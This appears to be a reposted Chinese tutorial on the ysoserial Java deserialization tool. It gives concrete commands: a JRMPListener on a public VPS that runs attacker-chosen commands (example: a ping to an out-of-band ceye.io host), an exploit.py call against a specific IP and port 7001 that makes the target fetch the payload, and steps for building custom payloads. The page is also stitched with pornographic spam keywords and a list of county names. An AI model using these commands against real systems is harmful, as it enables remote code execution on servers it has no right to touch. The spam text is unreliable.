91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

反序列化工具ysoserial使用介紹

發布時間:2020-07-08 04:49:17 來源:網絡 閱讀:79449 作者:wx5b0b88843cb2a 欄目:安全技術

反序列化工具ysoserial使用介紹

0x00 ysoserial是什么?

ysoserial集合了各種java反序列化payload;
下載地址:https://github.com/angelwhu/ysoserial

0x01 基本使用方法

在公網vps上執行:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener  【port】 CommonsCollections1 '【commands】'

port:公網vps上監聽的端口號
commands:需要執行的命令
例子:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2  rce.267hqw.ceye.io'

重啟一個shell窗口:

python exploit.py 【目標ip】 【目標端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】  【JRMPListener port】 JRMPClient

列子:

python exploit.py 118.89.53.139  7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139  1099 JRMPClient

0x02 在ysoserial編寫自己的payload

  1. git clone https://github.com/fanyingjie2/ysoserial.git
  2. 將自己編寫的payload放在下載的包中:路徑ysoserial/src/main/java/ysoserial/payloads/
  3. 修改Dockerfile
    反序列化工具ysoserial使用介紹
  4. docker build -t ysoserial .
  5. docker run -ti ID號 /bin/bash
  6. 在docke中執行 apt-get update
  7. 在docker中執行apt-get install lrzsz
  8. sz target/ysoserial.jar
向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

固安县| 古丈县| 华容县| 金昌市| 乾安县| 玉田县| 石阡县| 集安市| 合阳县| 衡阳市| 镇康县| 绥滨县| 安阳市| 洛南县| 晋中市| 闽侯县| 宜城市| 沅陵县| 醴陵市| 濮阳市| 修武县| 江西省| 沭阳县| 北宁市| 鄂托克旗| 六枝特区| 山阳县| 成武县| 延吉市| 武川县| 松桃| 蕉岭县| 资溪县| 霸州市| 通化市| 嫩江县| 勃利县| 高平市| 洛扎县| 九龙坡区| 玉山县|